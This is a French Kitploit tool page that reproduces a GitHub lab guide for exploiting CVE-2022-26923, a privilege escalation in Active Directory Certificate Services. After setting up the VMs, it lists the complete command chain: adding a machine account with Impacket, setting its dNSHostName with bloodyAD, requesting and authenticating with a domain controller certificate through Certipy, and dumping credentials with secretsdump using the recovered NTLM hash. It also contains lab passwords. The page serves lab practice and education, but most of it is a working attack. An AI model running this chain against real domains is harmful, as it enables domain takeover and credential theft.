Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-26923-rayng — Exploitation de CVE-2022-26923 | Kitploit
Outils/GitHubGitHub/rayngnpc/cve-2022-26923-rayng
Cassage de Mots de PasseEscalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'IntrusionAuthentificationApprentissage et ÉducationLabs et Pratique
GitHubrayngnpc/cve-2022-26923-rayng

CVE-2022-26923-rayng

Exploitation de CVE-2022-26923

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation de CVE-2022-26923 : Élévation de privilèges de l'autorité de certification

Présentation

CVE-2022-26923 est une vulnérabilité dans les services de certificats Active Directory (AD CS) qui permet à un attaquant d'élever ses privilèges en abusant de l'authentification par certificat. Ce guide décrit les étapes pour exploiter cette vulnérabilité à l'aide d'Impacket et de Certipy.


Tableau des identifiants

Machine virtuelleNom d'utilisateurMot de passe
Windows ServerAdministrator!@windowsadmintest101
Windows Servertestuser$Vulnerable139
Kali-Linux VMvagrantvagrant

Étape 1 : Cloner le dépôt et configurer les machines virtuelles

Commencez par cloner le dépôt contenant les fichiers nécessaires :

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2022-26923-rayng.git
cd CVE-2022-26923-rayng

Configurer les machines virtuelles

Le dépôt contient deux dossiers, chacun avec un Vagrantfile pour provisionner des machines virtuelles. Vous devez installer Vagrant sur votre machine hôte avant de continuer.

Installer Vagrant

Pour Windows

Téléchargez et installez Vagrant depuis ici. Ou installez-le via PowerShell :

root@kitploit:~
choco install vagrant
Pour Linux
root@kitploit:~
sudo apt update && sudo apt install vagrant -y

Machine virtuelle Windows Server 2022

Accédez au répertoire WindowsServer2022 :

root@kitploit:~
cd WindowsServer2022
vagrant up

Cette commande téléchargera et configurera la machine virtuelle Windows Server 2022 dans VirtualBox.

Machine virtuelle Kali Linux

Accédez au répertoire Kali-LinuxVM :

root@kitploit:~
cd Kali-LinuxVM
vagrant up

Étape 2 : Configurer le réseau virtuel

Étant donné que l'exploit nécessite un réseau NAT, configurez VirtualBox comme suit :

Sur Windows

Avant d'exécuter la commande ci-dessous, assurez-vous que VBoxManage est ajouté à vos variables d'environnement. Sinon, exécutez la commande en utilisant son chemin complet :

Ajout du réseau NAT

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Si VBoxManage n'est pas reconnu, utilisez :

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Sur Linux

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Assurez-vous de vérifier les deux machines virtuelles dans VirtualBox et qu'elles sont bien affectées à l'adaptateur réseau NatNetwork - NatNet1.

Vous pouvez créer un réseau NAT avec un nom différent, mais il doit être dans la plage IP 10.0.2.0/24.

Étape 3 : Modifier le fichier hosts

Avant de continuer, assurez-vous que Windows Server 2022 et la machine virtuelle Kali Linux sont allumés.

Accédez à la machine virtuelle Kali Linux pour démarrer l'attaque.

Mettez à jour votre fichier /etc/hosts pour mapper l'adresse IP du contrôleur de domaine :

root@kitploit:~
sudo nano /etc/hosts

Ajoutez l'entrée suivante :

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

Enregistrez et quittez.


Étape 4 : Configurer l'environnement

Accédez au répertoire CVE-26923 et activez l'environnement virtuel Python :

root@kitploit:~
cd ~/CVE-26923
source ~/CVE-26923/rayng/bin/activate

Étape 5 : Ajouter un ordinateur au domaine

À l'aide de l'utilitaire addcomputer d'Impacket :

root@kitploit:~
impacket-addcomputer -computer-name 'PCTEST1' -computer-pass 'testuser' -dc-host 10.0.2.121 -domain-netbios pchau.domain.local pchau.domain.local/testuser:'$Vulnerable139'

Étape 6 : Assigner PCTEST1 au contrôleur de domaine

Méthode 1 : Via SSH (si OpenSSH est installé sur le serveur cible)

root@kitploit:~
ssh [email protected]
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname
Set-ADComputer PCTEST1 -DnsHostName SERVER2022.pchau.domain.local
Get-ADComputer PCTEST1 -properties dnshostname,serviceprincipalname

Méthode 2 : Sans SSH (avec Impacket et BloodyAD)

Vérifiez les ordinateurs du domaine :

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

Accédez au répertoire bloodyAD et utilisez bloodyAD.py pour ajouter PCTEST1 au domaine :

root@kitploit:~
cd ~/CVE-26923/bloodyAD/
python3 bloodyAD.py -d pchau.domain.local -u testuser -p '$Vulnerable139' --host 10.0.2.121 set object PCTEST1$ dNSHostName -v 'SERVER2022.pchau.domain.local'

Vérifiez que PCTEST1 a bien été assigné au domaine :

root@kitploit:~
impacket-GetADComputers pchau.domain.local/testuser:'$Vulnerable139' -dc-ip 10.0.2.121

Étape 7 : Processus d'exploitation

Recherche de certificats vulnérables

Utilisez Certipy pour trouver des certificats vulnérables :

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser'

Demande d'un certificat

Demandez un certificat machine avec Certipy :

root@kitploit:~
certipy req -dc-ip 10.0.2.121 -username 'PCTEST1$' -password 'testuser' -template Machine -ca pchau-SERVER2022-CA

Authentification avec le certificat

Authentifiez-vous à l'aide du certificat obtenu :

root@kitploit:~
certipy auth -pfx server2022.pfx

Étape 8 : Extraction des hashs NTLM

Après avoir exécuté la commande certipy auth, deux hashs seront affichés. Le hash de droite sera utilisé pour l'authentification NTLM.

Exemple de sortie de hash :

root@kitploit:~
aad3b435b51404eeaad3b435b51404ee:69079fd4946af567d682d61e121f29e7

Utilisez le hash NTLM extrait pour extraire les identifiants :

root@kitploit:~
impacket-secretsdump '[email protected]' -hashes :69079fd4946af567d682d61e121f29e7

Ceci conclut la chaîne d'attaque complète pour l'exploitation de CVE-2022-26923.

Télécharger l’outil